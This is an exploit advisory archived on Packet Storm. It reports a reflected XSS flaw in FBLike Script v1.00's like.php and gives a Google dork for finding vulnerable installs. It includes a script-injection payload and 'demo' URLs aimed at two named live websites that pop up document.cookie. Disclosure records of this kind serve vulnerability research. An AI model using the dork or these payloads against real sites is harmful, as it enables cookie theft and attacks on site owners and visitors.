FBLike Script Cross Site Scripting

2012-03-25T00:00:00
ID PACKETSTORM:111184
Type packetstorm
Reporter Crim3R
Modified 2012-03-25T00:00:00

Description

                                        
                                            `# Exploit Title: FBLike Script Cross Site Scripting  
  
# Google Dork: Copyright © 2010 FBLike Script  
  
# Date: 25/03/2012 1:53 PM #EST  
  
# Author: Crim3R  
# software Link : http://zumset.com/product/fbilike_script_v100.html  
  
# Version: v1.00  
  
# Tested on: all  
  
# CVE : XSS  
========================================  
The xss is in like.php   
http://127.0.0.1/fbilike/like.php?id="><script>alert(XSS-By-Crim3R)</script>  
  
========================================  
Demo:  
http://www.talkgold.com/bans/like.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
  
http://ilikenigeria.com/like.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E  
  
  
thanks to : H3X - Einstein - thE_Knight - Naboodgar - C0NS74NTINE - Cruel -   
S.a.S - Net.Plus -  
Mehdi.H4ckCity - 2MzRp - Mikili - iC0der - farbodmahini - M.Prince - IrIst -  
==============Crim3R=====================  
All SST&HC Members  
`